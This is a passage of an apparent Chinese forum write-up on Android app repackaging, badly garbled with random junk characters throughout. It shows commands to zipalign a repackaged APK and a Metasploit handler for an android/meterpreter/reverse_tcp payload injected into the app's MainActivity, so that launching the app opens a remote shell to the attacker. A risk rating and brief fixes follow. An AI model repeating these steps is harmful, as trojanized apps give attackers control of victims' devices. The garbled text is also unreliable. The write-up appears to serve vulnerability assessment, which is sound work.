1 V3 Z8 W* G h% k5 B. G + e {! s4 d2 Z3 g4 | keytool -printcert -jarfile repackaged.apk 1 N5 z$ n( o4 ]+ B; g1 a 2 w7 M: F& Z. I% _8 N) e/ a

; A+ C) W) a! G+ N: l, E9 V3 ?4 R2 o$ G. ~& h9 { 对齐 1 O9 y) {5 [5 D# P; B$ z3 ~, D$ C7 Z4 x2 J+ {

9 y' N* h P6 V 1 o2 S9 ^4 a- ]4 c C; B 字节对齐优化 9 w0 f& U4 w# e9 P " Q3 d/ x# |' ^+ A9 J8 {1 {- _; X

6 ~* m1 t' {$ z2 U. ?9 F . ]% r/ ?0 L& Q: Q8 j- R zipalign -v 4 repackaged.apk final.apk Z" R r. |9 y8 I4 t$ _6 S3 C6 Q& ~' G

) t) d' i" g% a2 O- H% }4 i% l) X3 \9 Y4 [& `1 R 检查是否对齐 : F, P5 j. L/ x% \4 L1 \7 E, f4 H( ]- D5 a+ |

6 a" }' g, N) }: t 1 n6 i, M- o4 P/ W6 y* ^ zipalign -c -v 4 final.apk , Y/ X A4 V, ~0 j( V8 z& Y$ I3 j : v$ G: }4 L9 t" ^2 z, ~

( K3 E3 Y8 I, f. l* E: ? + Q7 A! o/ [: \. K/ y 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 # l6 I3 w8 O9 C5 R* N* X3 S; Q( ] " g6 x+ _1 i: c# n: | c

6 n& Y2 A! D& _! j' { 7 L- B4 G' K3 l1 |( r/ W& i 启动Metasploit控制台，配置参数等待上线 # I9 ~6 N# E4 y# R0 h 1 n% z6 I! t, x. I q2 N

& ~2 W/ b. v( g7 O( r( ^% N" d. p% X# T; k9 H+ y" \& V% K! ~2 s5 ] 在终端依次输入如下命令 5 e, Z) l5 @4 N! n % J. x6 V, T& u+ q/ T

/ J' l6 h- B3 o7 A; Z$ D7 p) \7 l& E2 ]5 u: b. s msfconsole + b4 e2 M6 w% b8 [8 |7 R& c 9 {1 B2 }9 h7 C1 o% q+ A7 B6 b

5 b+ }2 d- c- ]; Z1 i) B7 `2 q' |% {5 u9 p use exploit/multi/handler [3 ^. M' Y7 D- |7 f# X- q2 {$ w8 |% e

! h5 q6 K* a9 s- r6 L ( T& o9 z3 A) ~ set PAYLOAD android/meterpreter/reverse_tcp # }6 C6 j/ ?. r( ? + G. f0 e/ ~& ~+ b) g9 r) K; S

% u9 `9 t0 I' z. e) y, B" P " J! d% K* C: k set LHOST 192.xxx.xx.xx e; `, k& g H& k7 M8 f! v 6 j# m% m3 e4 d

' w0 x! k0 P( g* ~! W ' _2 ]! I7 {* P" j set LPORT 4444 : Z7 v( W; U( G+ H4 b # f2 m: ]! J- Q" q8 O4 N

3 p7 P; f: t3 `" N5 O* w9 Z 6 E- `3 I2 V4 K% g7 j exploit 6 c! c4 [. c7 ?" |0 \$ n, H 0 g. E; O% t: x, v6 A% G! v

# k" ~$ d4 H0 F& a 4 n' M5 o# l: c 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 7 F8 c. A8 b4 |3 A$ @( h0 {5 p 9 y. K- v5 R/ l

! J6 q% x T' E/ ` 8 A4 j3 M9 G8 {. k 漏洞危害：中 1 L5 i+ e, Z6 g( E4 j% e& V1 S" y ! C7 }% e! H$ j2 X/ V

5 M$ D" m8 y v# d9 l; U % Y! l4 G1 l4 a: x% M. {/ _ $ C9 M& j" h# G& { : C% `0 }3 \& L: Q7 _- A 严重程度 " }+ T& `+ o9 q( H + y' s( C. T7 @+ a ; I6 L" N U1 E% i/ z T, j4 r6 G6 T) A	4 K* Q- ^5 \|0 F6 v& S9 t- c2 v V$ R! O) v* w- R 3 ?/ c% p2 {% x8 F+ w0 \/ i9 K/ H: `+ F! _ 高 D! M7 `8 f) m( a * t3 [, `. g T" k5 _/ z, Q' h 6 K. t6 H! \! g2 V3 T' @ 0 Q C, D9 g. J9 g) ^5 j	2 G4 @+ a2 z- b9 ?7 A 5 I/ @) z9 c9 D- O 0 m. ^2 f! B# X0 m ( X$ {# m6 D- F3 D6 G ■ : V+ p, V: L' d. u 0 z. v0 I6 y j( } & V1 N, U7 f$ t8 d+ [& m+ } . h' ?4 J, d: H- J1 O	) d6 p8 V# }" c1 i0 K L. Z3 K ?( T A( f' K 4 W- l0 H" Q' U9 H5 C2 ^ + d8 f3 f: \7 h% \6 s 中 5 d7 a% P I9 c) v0 }4 G5 U 8 E5 \/ n8 a) l 3 v5 W/ ?. x" c F* Q9 p0 p8 T$ E" g7 v+ u	3 R: @$ l8 _" T" i 5 n9 J# c e& { / b! A# I0 l: s* M: o % [! b# _; Q5 d9 C ' J+ U3 M1 o$ L- f( P & O/ f( p2 l: Y1 t- o* N ! _) F( W# k0 ]9 N( g * o# Y% \$ x+ w8 j9 r* R 7 K! m" _) A4 ~# e& ?3 J2 [7 B- Q ?9 E6 T" j3 ]' m5 }6 V	8 g5 D# O" y. ?: q& u$ Y" w7 F % H3 n0 s# f& Y * Z& C8 Q, v5 B% X& R& L ( D" h7 r' W0 ]8 \|& R( B" Q: z# \| 低 " C3 E/ E' u& A l 5 L# L) \$ U1 `9 L( ] 8 y! @/ W, `% M$ ^* Y- t- @' K . p7 R, o, e8 g	5 f6 }( h# `1 ]+ \|# K) x $ y1 s. `: ^% {8 q2 r # s; G* ?* N' x/ M' i 7 h. A0 Q: n' }+ E: G4 K ( `) Y# h6 \|' V4 i. Q6 N3 b* e3 A1 d3 F7 G6 v . p1 \* H+ h) ]6 A6 x " V9 `0 K* r; m' S3 m, G: G , B1 P# K: H( j& @& i, d . n( V! X- \|8 R! \|

* D# ]% S" g7 n 1 ?! W) M. z+ j+ T+ V3 Q! s) @ % x' {+ f1 } X$ ]# H% \4 u7 p , h k. |* ^: h

( A2 g3 }- f: S4 a - |7 [7 ?; S2 S3 s% g5 A- M, K 修复方法： & }7 n) F6 Q' ]9 F: _ * v/ ^4 T: \, V( B( E4 U

' K( @0 k* J, n, q * w4 g" o5 u. |+ J0 J: [ 1.在 APP 启动时应做签名校验防止二次打包。
" O7 l; ?# q) H: K O! J [2 x3 {1 A r6 i9 b+ a6 F 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ' l- o* ?6 V+ n- k' l5 T0 g% u/ r0 `( }* M0 A

& w0 G" x4 f3 y" d' A8 t( G7 ~8 H& N& C6 p3 J ) [; Z/ [, A& E8 X! f; } 1 G C" Q1 j/ t1 l" Q- r4 U9 ^

/ Q2 t# J& d1 k0 H' ]+ L0 V( T " l! Y u4 v& o+ O4 w
4 [) W# ~' M) V$ c; U4 ^; U; g& L& h5 n. i! t4 l6 i( T

		自动登录	找回密码
密码			立即注册